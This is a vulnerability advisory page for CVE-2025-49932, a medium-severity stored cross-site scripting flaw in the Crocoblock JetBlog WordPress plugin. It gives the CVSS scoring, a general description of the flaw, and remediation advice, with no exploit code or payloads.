CVE-2025-49932

MEDIUM
2025-10-22 [email protected]
WordPress PHP XSS
6.5
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

2
Analysis Generated
Apr 01, 2026 - 15:22 vuln.today
CVE Published
Oct 22, 2025 - 15:15 nvd
MEDIUM 6.5

DescriptionNVD

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetBlog jet-blog allows Stored XSS.This issue affects JetBlog: from n/a through <= 2.4.4.1.

AnalysisAI

Stored Cross-Site Scripting (XSS) in Crocoblock JetBlog WordPress plugin through version 2.4.4.1 allows authenticated users with low privileges to inject malicious scripts that persist in web pages and execute in the browsers of other site visitors, potentially compromising session tokens, stealing sensitive data, or performing unauthorized actions. EPSS score of 0.07% and lack of public exploit code indicate low real-world exploitation probability despite the moderate CVSS 6.5 score.

Technical ContextAI

The vulnerability stems from improper neutralization of user input during HTML/web page generation (CWE-79), a fundamental class of web application security failures. JetBlog is a WordPress plugin (CPE likely wp:crocoblock:jetblog) that handles blog content creation and display. The plugin fails to properly sanitize or escape user-supplied input before rendering it in web page output, allowing authenticated users to embed JavaScript code that executes in the context of the vulnerable web application. The stored nature of this XSS means the malicious payload persists in the application's database and is served to all subsequent page visitors, making it particularly dangerous compared to reflected XSS variants.

Affected ProductsAI

Crocoblock JetBlog WordPress plugin from inception through version 2.4.4.1 is affected. The vulnerability impacts all installations of the jet-blog plugin at version 2.4.4.1 or earlier. WordPress administrators using this plugin should verify their current version and apply updates accordingly.

RemediationAI

Update Crocoblock JetBlog to a version after 2.4.4.1 to receive security fixes addressing the XSS vulnerability. Visit the official Patchstack vulnerability database entry at https://patchstack.com/database/Wordpress/Plugin/jet-blog/vulnerability/wordpress-jetblog-plugin-2-4-4-1-cross-site-scripting-xss-vulnerability for patch availability details and vendor guidance. If an immediate patch is unavailable, restrict plugin access to trusted administrators only and audit existing blog content for suspicious script injection. Consider temporarily disabling the plugin on production sites until a patched version is confirmed available.

Share

CVE-2025-49932 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy